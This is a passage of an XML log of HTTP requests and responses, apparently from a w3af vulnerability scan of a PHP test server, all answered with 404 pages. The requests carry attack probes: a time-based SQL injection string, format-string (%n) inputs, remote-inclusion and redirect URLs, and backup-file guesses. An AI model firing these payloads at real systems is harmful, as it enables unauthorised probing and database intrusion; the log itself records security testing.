                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="320">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/htTps%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/htTps%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="321">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/fTp%3A%2F%2Fw3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="556" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A%2F%2Fw3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="323">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/fTp%3A/w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/fTp%3A//w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="326">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="327">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="328">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="329">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n%25n HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="330">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%5E%28%23%24%21%40%23%24%29%28%28%29%29%29%2A%2A%2A%2A%2A%2A HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="332">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fwww.w3af.org%2F HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="561" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fwww.w3af.org%2F&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="333">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/http%3A/www.w3af.org/ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="555" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//www.w3af.org/&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="335">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/w3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;///w3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="336">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/%2F%2Fw3af.org HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="547" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/%2F%2Fw3af.org&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="337">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="338">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="339">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post~ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="340">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="341">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="854">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/1%27%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="343">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/post.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="344">
                <httprequest>
                    <status>GET http://10.12.68.43:31337/post.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/post" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
